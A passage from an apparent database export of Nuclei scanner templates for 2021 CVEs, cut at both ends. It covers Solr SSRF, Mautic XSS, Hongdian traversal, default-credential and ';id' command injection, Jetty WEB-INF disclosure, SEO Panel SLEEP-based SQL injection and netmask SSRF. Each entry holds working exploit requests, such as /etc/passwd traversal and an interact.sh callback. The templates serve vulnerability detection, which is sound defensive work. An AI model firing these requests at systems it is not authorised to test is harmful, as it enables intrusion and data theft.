ReplicationHandler on another Solr core to replicate index data into the local core. To prevent a SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the \"shards\" parameter.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to internal resources, data leakage, and potential remote code execution.\n remediation: This issue is resolved in Apache Solr 8.8.2 and later.\n reference:\n - https://www.anquanke.com/post/id/238201\n - https://ubuntu.com/security/CVE-2021-27905\n - https://nvd.nist.gov/vuln/detail/CVE-2021-27905\n - https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/\n - https://lists.apache.org/thread.html/r0ddc3a82bd7523b1453cb7a5e09eb5559517145425074a42eb326b10%40%3Cannounce.apache.org%3E\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-27905\n cwe-id: CWE-918\n epss-score: 0.94309\n epss-percentile: 0.99031\n cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: apache\n product: solr\n tags: cve2021,cve,apache,solr,ssrf\n\nhttp:\n - raw:\n - |\n GET /solr/admin/cores?wt=json HTTP/1.1\n Host: {{Hostname}}\n Accept-Language: en\n Connection: close\n - |\n GET /solr/{{core}}/replication/?command=fetchindex&masterUrl=https://interact.sh HTTP/1.1\n Host: {{Hostname}}\n Accept-Language: en\n Connection: close\n\n matchers:\n - type: word\n part: body\n words:\n - 'OK'\n\n extractors:\n - type: regex\n name: core\n group: 1\n regex:\n - '\"name\"\\:\"(.*?)\"'\n internal: true\n# digest: 4a0a00473045022100a5eeed4aa78e0ab67f4cc386a9ff9940e1bf79af086160f50cfcb22b541c6ac2022077db0dfda45ed661c6094d7fc069db330ff5e1854903adc81a368722db443bdc:922c64590222798bb761d5b6d8e72950", "hash": "6a3a7e01c1662d6f9626142a20689cef", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308324" }, "name": "CVE-2021-27909.yaml", "content": "id: CVE-2021-27909\n\ninfo:\n name: Mautic <3.3.4 - Cross-Site Scripting\n author: kiransau\n severity: medium\n description: Mautic before 3.3.4 contains a cross-site scripting vulnerability on the password reset page in the bundle parameter of the URL. An attacker can inject arbitrary script, steal cookie-based authentication credentials, and/or launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions.\n remediation: |\n Upgrade Mautic to version 3.3.4 or later to mitigate this vulnerability.\n reference:\n - https://github.com/mautic/mautic/security/advisories/GHSA-32hw-3pvh-vcvc\n - https://nvd.nist.gov/vuln/detail/CVE-2021-27909\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-27909\n cwe-id: CWE-79\n epss-score: 0.00094\n epss-percentile: 0.3927\n cpe: cpe:2.3:a:acquia:mautic:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: acquia\n product: mautic\n shodan-query: title:\"Mautic\"\n tags: cve2021,cve,mautic,xss,acquia\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/passwordreset?bundle=';alert(document.domain);var+ok='\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"'';alert(document.domain);var ok='\"\n - 'mauticBasePath'\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100e683409a42481a5acd5030e9e2be3bff0665fbc807a45864c349a222da9660ed022100dcca043790c8a6718aacdfa104e0129441726aa52264f8642a352b641c03507c:922c64590222798bb761d5b6d8e72950", "hash": "3220efe2d0d8d0ff0c5787ea54bd6812", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308325" }, "name": "CVE-2021-27931.yaml", "content": "id: CVE-2021-27931\n\ninfo:\n name: LumisXP <10.0.0 - Blind XML External Entity Attack\n author: alph4byt3\n severity: critical\n description: LumisXP (aka Lumis Experience Platform) before 10.0.0 allows unauthenticated blind XML external entity (XXE) attacks via an API request to PageControllerXml.jsp. One can send a request crafted with an XXE payload and achieve outcomes such as reading local server files or denial of service.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, server compromise, or further attacks on internal systems.\n remediation: |\n Upgrade LumisXP to version 10.0.0 or above to mitigate the vulnerability.\n reference:\n - https://github.com/sl4cky/LumisXP-XXE---POC/blob/main/poc.txt\n - https://nvd.nist.gov/vuln/detail/CVE-2021-27931\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H\n cvss-score: 9.1\n cve-id: CVE-2021-27931\n cwe-id: CWE-611\n epss-score: 0.4974\n epss-percentile: 0.97222\n cpe: cpe:2.3:a:lumis:lumis_experience_platform:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: lumis\n product: lumis_experience_platform\n tags: cve2021,cve,lumis,xxe,oast,blind\n\nhttp:\n - raw:\n - |\n POST /lumis/portal/controller/xml/PageControllerXml.jsp HTTP/1.1\n Host: {{Hostname}}\n\n \n \n \n ]>\n \n &xxe;\n \n\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n# digest: 4a0a004730450220581131eca2ef63301253ff49449855879636bad0e9afd4bbc06992068f084b32022100e42d20545e6f7a6ff2aaa16ec56637fab0aac6462036f42fe6dec31c13882d29:922c64590222798bb761d5b6d8e72950", "hash": "3d2a84a4cf5616c64b99fed2207a4cc6", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308326" }, "name": "CVE-2021-28073.yaml", "content": "id: CVE-2021-28073\n\ninfo:\n name: Ntopng Authentication Bypass\n author: z3bd\n severity: critical\n description: Ntopng, a passive network monitoring tool, contains an authentication bypass vulnerability in ntopng <= 4.2\n impact: |\n Successful exploitation of this vulnerability could result in unauthorized access to sensitive information and potential compromise of the affected system.\n remediation: Upgrade to version 4.3 or later.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2021-27573\n - http://noahblog.360.cn/ntopng-multiple-vulnerabilities/\n - https://github.com/AndreaOm/docs/blob/c27d2db8dbedb35c9e69109898aaecd0f849186a/wikipoc/PeiQi_Wiki/%E6%9C%8D%E5%8A%A1%E5%99%A8%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/HongKe/HongKe%20ntopng%20%E6%B5%81%E9%87%8F%E5%88%86%E6%9E%90%E7%B3%BB%E7%BB%9F%20%E6%9D%83%E9%99%90%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E%20CVE-2021-28073.md\n classification:\n cve-id: CVE-2021-28073\n metadata:\n max-request: 2\n tags: cve2021,cve,ntopng\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/lua/%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2ffind_prefs.lua.css\"\n - \"{{BaseURL}}/lua/.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2ffind_prefs.lua.css\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"application/json\"\n part: header\n\n - type: word\n words:\n - '\"results\":'\n - '\"name\":'\n - '\"tab\":'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100d50866a099d181b7bf3a3a4199e766c27e8732b1396992dfc9484b85b678728c022100bda66f0395373be8fc0473f8e5339d875c03432fce8f5147a92d55b205357af8:922c64590222798bb761d5b6d8e72950", "hash": "c1164a433a41d90e3b7293c75a41643c", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308327" }, "name": "CVE-2021-28149.yaml", "content": "id: CVE-2021-28149\n\ninfo:\n name: Hongdian H8922 3.0.5 Devices - Local File Inclusion\n author: gy741\n severity: medium\n description: |\n Hongdian H8922 3.0.5 devices are vulnerable to local file inclusion. The /log_download.cgi log export handler does not validate user input and allows a remote attacker with minimal privileges to download any file from the device by substituting ../ (e.g., ../../etc/passwd) This can be carried out with a web browser by changing the file name accordingly. Upon visiting log_download.cgi?type=../../etc/passwd and logging in, the web server will allow a download of the contents of the /etc/passwd file.\n impact: |\n Successful exploitation of this vulnerability can result in unauthorized access to sensitive files, potentially leading to further compromise of the system.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in Hongdian H8922 3.0.5 Devices.\n reference:\n - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/\n - http://en.hongdian.com/Products/Details/H8922\n - https://nvd.nist.gov/vuln/detail/CVE-2021-28149\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ArrestX/--POC\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 6.5\n cve-id: CVE-2021-28149\n cwe-id: CWE-22\n epss-score: 0.05499\n epss-percentile: 0.93036\n cpe: cpe:2.3:o:hongdian:h8922_firmware:3.0.5:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: hongdian\n product: h8922_firmware\n tags: cve2021,cve,hongdian,traversal\n\nhttp:\n - raw:\n - |\n GET /log_download.cgi?type=../../etc/passwd HTTP/1.1\n Host: {{Hostname}}\n Cache-Control: max-age=0\n Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=\n - |\n GET /log_download.cgi?type=../../etc/passwd HTTP/1.1\n Host: {{Hostname}}\n Authorization: Basic YWRtaW46YWRtaW4=\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"application/octet-stream\"\n\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n - \"sshd:[x*]\"\n - \"root:[$]\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022079d42e417c59ebc709bfd0e05a3798b78d9393f12027b3df901af863aa6ccf3d022100d2b4d65bddfc8ca2eab9587d97cfc61f904100d1fdcc1317c978237d369a57c1:922c64590222798bb761d5b6d8e72950", "hash": "3b25b3bb3718b9bac4914bb075ba5519", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308328" }, "name": "CVE-2021-28150.yaml", "content": "id: CVE-2021-28150\n\ninfo:\n name: Hongdian H8922 3.0.5 - Information Disclosure\n author: gy741\n severity: medium\n description: Hongdian H8922 3.0.5 is susceptible to information disclosure. An attacker can access cli.conf (with the administrator password and other sensitive data) via /backup2.cgi and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n Successful exploitation of this vulnerability can lead to the exposure of sensitive data, potentially compromising the confidentiality of the system and its users.\n remediation: |\n Apply the latest security patch or update provided by Hongdian to fix the information disclosure vulnerability (CVE-2021-28150).\n reference:\n - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/\n - http://en.hongdian.com/Products/Details/H8922\n - https://nvd.nist.gov/vuln/detail/CVE-2021-28150\n classification:\n cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 5.5\n cve-id: CVE-2021-28150\n cwe-id: CWE-425\n epss-score: 0.00253\n epss-percentile: 0.63106\n cpe: cpe:2.3:o:hongdian:h8922_firmware:3.0.5:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: hongdian\n product: h8922_firmware\n tags: cve2021,cve,hongdian,exposure\n\nhttp:\n - raw:\n - |\n GET /backup2.cgi HTTP/1.1\n Host: {{Hostname}}\n Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=\n - |\n GET /backup2.cgi HTTP/1.1\n Host: {{Hostname}}\n Authorization: Basic YWRtaW46YWRtaW4=\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"application/octet-stream\"\n\n - type: word\n part: body\n words:\n - \"CLI configuration saved from vty\"\n - \"service webadmin\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100c210e8ed390ead0950a65257b8d9b9eed6a403b4234fe537f30c7d0529e9aad70220287ac350869e7bbabb19928f08ff35cffd9808b6371815e3dd78e9e0e64d7cce:922c64590222798bb761d5b6d8e72950", "hash": "3c313cca9cd84a39d346b187cd299e66", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308329" }, "name": "CVE-2021-28151.yaml", "content": "id: CVE-2021-28151\n\ninfo:\n name: Hongdian H8922 3.0.5 - Remote Command Injection\n author: gy741\n severity: high\n description: |\n Hongdian H8922 3.0.5 devices are susceptible to remote command injection via shell metacharacters into the ip-address (a/k/a Destination) field to the tools.cgi ping command, which is accessible with the username guest and password guest. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system.\n impact: |\n Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected device.\n remediation: |\n Apply the latest security patch or update to a non-vulnerable version of the Hongdian H8922 firmware.\n reference:\n - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/\n - http://en.hongdian.com/Products/Details/H8922\n - https://nvd.nist.gov/vuln/detail/CVE-2021-28151\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/ArrestX/--POC\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2021-28151\n cwe-id: CWE-78\n epss-score: 0.96847\n epss-percentile: 0.99638\n cpe: cpe:2.3:o:hongdian:h8922_firmware:3.0.5:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: hongdian\n product: h8922_firmware\n tags: cve2021,cve,hongdian,rce,injection\n\nhttp:\n - raw:\n - |\n POST /tools.cgi HTTP/1.1\n Host: {{Hostname}}\n Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=\n Origin: {{BaseURL}}\n Referer: {{BaseURL}}/tools.cgi\n\n op_type=ping&destination=%3Bid\n - |\n POST /tools.cgi HTTP/1.1\n Host: {{Hostname}}\n Authorization: Basic YWRtaW46YWRtaW4=\n Origin: {{BaseURL}}\n Referer: {{BaseURL}}/tools.cgi\n\n op_type=ping&destination=%3Bid\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"text/html\"\n - \"application/x-www-form-urlencoded\"\n condition: or\n\n - type: regex\n regex:\n - 'uid=\\d+\\(([^)]+)\\) gid=\\d+\\(([^)]+)\\)'\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220543f456226b5ababe273ce9ad8c34d065bb95024abb3a99cfd1b28be68fd898f02204b87ac2d557eb22432055d8b6319a30fc6e69fafa9032a16626296da752838d0:922c64590222798bb761d5b6d8e72950", "hash": "4d695eb460904017a58af5985e7bd0f8", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30832a" }, "name": "CVE-2021-28164.yaml", "content": "id: CVE-2021-28164\n\ninfo:\n name: Eclipse Jetty - Information Disclosure\n author: noamrathaus\n severity: medium\n description: |\n Eclipse Jetty 9.4.37.v20210219 to 9.4.38.v20210224 is susceptible to improper authorization. The default compliance mode allows requests with URIs that contain %2e or %2e%2e segments to access protected resources within the WEB-INF directory. An attacker can access sensitive information regarding the implementation of a web application.\n impact: |\n An attacker can exploit this vulnerability to access sensitive information, potentially leading to further attacks or unauthorized access.\n remediation: |\n Apply the latest security patches or updates provided by the Eclipse Jetty project to fix the information disclosure vulnerability.\n reference:\n - https://github.com/eclipse/jetty.project/security/advisories/GHSA-v7ff-8wcx-gmc5\n - https://github.com/vulhub/vulhub/tree/1239bca12c75630bb2033b728140ed5224dcc6d8/jetty\n - https://lists.apache.org/thread.html/r780c3c210a05c5bf7b4671303f46afc3fe56758e92864e1a5f0590d0@%3Cjira.kafka.apache.org%3E\n - http://packetstormsecurity.com/files/164590/Jetty-9.4.37.v20210219-Information-Disclosure.html\n - https://nvd.nist.gov/vuln/detail/cve-2021-28164\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2021-28164\n cwe-id: CWE-200,NVD-CWE-Other\n epss-score: 0.04805\n epss-percentile: 0.9254\n cpe: cpe:2.3:a:eclipse:jetty:9.4.37:20210219:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: eclipse\n product: jetty\n tags: cve2021,cve,packetstorm,vulhub,jetty,exposure,eclipse\nflow: http(1) && http(2)\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/WEB-INF/web.xml\"\n\n matchers:\n - type: dsl\n internal: true\n dsl:\n - \"!contains_all(body, '', 'java.sun.com')\"\n - \"!contains_all(header, 'application/xml')\"\n - \"status_code != 200\"\n - \"status_code != 404\"\n condition: and\n\n - method: GET\n path:\n - \"{{BaseURL}}/%2e/WEB-INF/web.xml\"\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - \"contains_all(body, '', 'java.sun.com')\"\n - \"contains_all(header, 'application/xml')\"\n - \"status_code == 200\"\n condition: and\n# digest: 4a0a00473045022100886a031dbb45bd2585021ea2d7ea51b4bd28d2403afa70cd92fc253a0cb7d5cc022038e2460485ace429f2ae598ca2073cb289cfbe470e28f479fea812fe0e7abdd4:922c64590222798bb761d5b6d8e72950", "hash": "b5f4524dd0c8c835071a8c286dea0657", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30832b" }, "name": "CVE-2021-28169.yaml", "content": "id: CVE-2021-28169\n\ninfo:\n name: Eclipse Jetty ConcatServlet - Information Disclosure\n author: pikpikcu\n severity: medium\n description: |\n Eclipse Jetty through 9.4.40, through 10.0.2, and through 11.0.2 is susceptible to information disclosure. Requests to the ConcatServlet with a doubly encoded path can access protected resources within the WEB-INF directory, thus enabling an attacker to potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n An attacker can exploit this vulnerability to access sensitive information, potentially leading to further attacks or unauthorized access.\n remediation: |\n Upgrade to Eclipse Jetty version 9.4.40 or later to mitigate this vulnerability.\n reference:\n - https://twitter.com/sec715/status/1406787963569065988\n - https://github.com/eclipse/jetty.project/security/advisories/GHSA-gwcr-j4wh-j3cq\n - https://lists.apache.org/thread.html/r2721aba31a8562639c4b937150897e24f78f747cdbda8641c0f659fe@%3Cusers.kafka.apache.org%3E\n - https://nvd.nist.gov/vuln/detail/CVE-2021-28169\n - https://lists.apache.org/thread.html/r04a4b4553a23aff26f42635a6ae388c3b162aab30a88d12e59d05168@%3Cjira.kafka.apache.org%3E\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2021-28169\n cwe-id: CWE-200,NVD-CWE-Other\n epss-score: 0.00401\n epss-percentile: 0.70865\n cpe: cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: eclipse\n product: jetty\n tags: cve2021,cve,jetty,eclipse\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/static?/%2557EB-INF/web.xml\"\n - \"{{BaseURL}}/concat?/%2557EB-INF/web.xml\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"application/xml\"\n\n - type: word\n part: body\n words:\n - \"\"\n - \"java.sun.com\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502210099d1285740ade18a2d452515bacddf15f7433c6ef658f2b8640ed13791476a7e022048d15f48ee10c490f6696a29b8999737d08894c5770fc0d7973844f075ce1238:922c64590222798bb761d5b6d8e72950", "hash": "9c8696cbed1eeae9fb2ef04c6ed53901", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30832c" }, "name": "CVE-2021-28377.yaml", "content": "id: CVE-2021-28377\n\ninfo:\n name: Joomla! ChronoForums 2.0.11 - Local File Inclusion\n author: 0x_Akoko\n severity: medium\n description: Joomla! ChronoForums 2.0.11 avatar function is vulnerable to local file inclusion through unauthenticated path traversal attacks. This enables an attacker to read arbitrary files, for example the Joomla! configuration file which contains credentials.\n impact: |\n The LFI vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information or allowing remote code execution.\n remediation: |\n Update Joomla! ChronoForums to the latest version (2.0.12) or apply the provided patch to fix the LFI vulnerability.\n reference:\n - https://herolab.usd.de/en/security-advisories/usd-2021-0007/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-28377\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2021-28377\n cwe-id: CWE-22\n epss-score: 0.00106\n epss-percentile: 0.42913\n cpe: cpe:2.3:a:chronoengine:chronoforums:2.0.11:*:*:*:*:joomla:*:*\n metadata:\n max-request: 1\n vendor: chronoengine\n product: chronoforums\n framework: joomla\n tags: cve2021,cve,chronoforums,lfi,joomla,chronoengine\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php/component/chronoforums2/profiles/avatar/u1?tvout=file&av=../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100d6e6b6ae214509b16663c1be174481963518b40031b35c0ebb448735a7f82f2b022100e97e0b83c9fb1f14e13a75823cc9ebf58a93104083b1efa179e9d0045b26eec2:922c64590222798bb761d5b6d8e72950", "hash": "0f383474fcb7d8a8b8cb7c485e4c0715", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30832d" }, "name": "CVE-2021-28419.yaml", "content": "id: CVE-2021-28419\n\ninfo:\n name: SEO Panel 4.8.0 - Blind SQL Injection\n author: theamanrawat\n severity: high\n description: |\n SEO Panel 4.8.0 is susceptible to time-based blind SQL injection via the order_col parameter in archive.php. An attacker can potentially retrieve all databases and thus obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database.\n remediation: |\n Upgrade to a patched version of SEO Panel or apply the necessary security patches.\n reference:\n - https://github.com/seopanel/Seo-Panel/issues/209\n - https://www.seopanel.org/spdownload/4.8.0\n - https://nvd.nist.gov/vuln/detail/CVE-2021-28419\n - http://packetstormsecurity.com/files/162322/SEO-Panel-4.8.0-SQL-Injection.html\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2021-28419\n cwe-id: CWE-89\n epss-score: 0.17236\n epss-percentile: 0.95637\n cpe: cpe:2.3:a:seopanel:seo_panel:4.8.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: seopanel\n product: seo_panel\n tags: cve2021,cve,sqli,seopanel,auth,packetstorm\n\nhttp:\n - raw:\n - |\n GET / HTTP/1.1\n Host: {{Hostname}}\n Cookie: _csrf={{rand_base(54,\"abc\")}};\n - |\n POST /login.php HTTP/1.1\n Host: {{Hostname}}\n Origin: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n Referer: {{BaseURL}}login.php\n Cookie: _csrf={{rand_base(54,\"abc\")}};\n\n sec=login&red_referer=http%3A%2F%2F{{BaseURL}}&userName={{username}}&password={{password}}&login=\n - |\n GET /archive.php?from_time=2021-04-25&order_col=(SELECT+7397+FROM(SELECT(SLEEP(3)))test)&order_val=DESC&report_type=website-search-reports&search_name=&sec=viewWebsiteSearchSummary&to_time=2021-04-25&website_id= HTTP/1.1\n Host: {{Hostname}}\n Cookie: _csrf={{rand_base(54,\"abc\")}};\n\n matchers:\n - type: dsl\n dsl:\n - 'duration_3>=6'\n - 'status_code_3 == 200'\n - 'contains(body_3, \"Overall Report Summary\")'\n condition: and\n# digest: 4b0a00483046022100ece85ed0a3e7f7b62a57b55f6bcc77db0d19a90ecb24f30602d76c261fe03159022100f1481ca4357aab094b84c582f7d0dea2013206ee99a0d03a7ced0a91ecf93b59:922c64590222798bb761d5b6d8e72950", "hash": "42aeaf1c5e2dd125aa691bc3c5ffb90f", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30832e" }, "name": "CVE-2021-28854.yaml", "content": "id: CVE-2021-28854\n\ninfo:\n name: VICIdial Sensitive Information Disclosure\n author: pdteam\n severity: high\n description: VICIdial's Web Client is susceptible to information disclosure because it contains many sensitive files that can be accessed from the client side. These files contain mysqli logs, auth logs, debug information, successful and unsuccessful login attempts with their corresponding IP's, User-Agents, credentials and much more. This information can be leveraged by an attacker to gain further access to VICIdial systems.\n impact: |\n An attacker can exploit this vulnerability to gain unauthorized access to sensitive information, such as user credentials or customer data.\n remediation: |\n Apply the latest security patches and updates provided by VICIdial to fix the vulnerability and ensure sensitive information is properly protected.\n reference:\n - https://github.com/JHHAX/VICIdial\n classification:\n cve-id: CVE-2021-28854\n metadata:\n max-request: 1\n tags: cve2021,cve,sqli\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/agc/vicidial_mysqli_errors.txt\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - 'text/plain'\n part: header\n\n - type: status\n status:\n - 200\n\n - type: word\n words:\n - 'vdc_db_query'\n part: body\n# digest: 4a0a004730450220489b98ebac6129b4e632e2014c7658c03aec08c7ca984b53e3c45692cae46263022100b3dec3ba24f3da255e94dd1a2e55e52377ca50129fb3840688a253fd5f07eef4:922c64590222798bb761d5b6d8e72950", "hash": "937d38a6174f82c17490819d5c0f6e3e", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30832f" }, "name": "CVE-2021-28918.yaml", "content": "id: CVE-2021-28918\n\ninfo:\n name: Netmask NPM Package - Server-Side Request Forgery\n author: johnjhacking\n severity: critical\n description: Netmask NPM Package is susceptible to server-side request forgery because of improper input validation of octal strings in netmask npm package. This allows unauthenticated remote attackers to perform indeterminate SSRF, remote file inclusion, and local file inclusion attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts.\n impact: |\n An attacker can exploit this vulnerability to make requests to internal resources, potentially leading to unauthorized access or information disclosure.\n remediation: |\n Upgrade to Netmask version 2.0.0 or later, which includes a fix for this vulnerability.\n reference:\n - https://github.com/sickcodes/security/blob/master/advisories/SICK-2021-011.md\n - https://github.com/advisories/GHSA-pch5-whg9-qr2r\n - https://nvd.nist.gov/vuln/detail/CVE-2021-28918\n - https://github.com/rs/node-netmask\n - https://rootdaemon.com/2021/03/29/vulnerability-in-netmask-npm-package-affects-280000-projects/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\n cvss-score: 9.1\n cve-id: CVE-2021-28918\n cwe-id: CWE-704\n epss-score: 0.02704\n epss-percentile: 0.89404\n cpe: cpe:2.3:a:netmask_project:netmask:*:*:*:*:*:node.js:*:*\n metadata:\n max-request: 3\n vendor: netmask_project\n product: netmask\n framework: node.js\n tags: cve2021,cve,npm,netmask,ssrf,lfi,netmask_project,node.js\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/?url=http://0177.0.0.1/server-status\"\n - \"{{BaseURL}}/?host=http://0177.0.0.1/server-status\"\n - \"{{BaseURL}}/?file=http://0177.0.0.1/etc/passwd\"\n\n stop-at-first-match: true\n\n 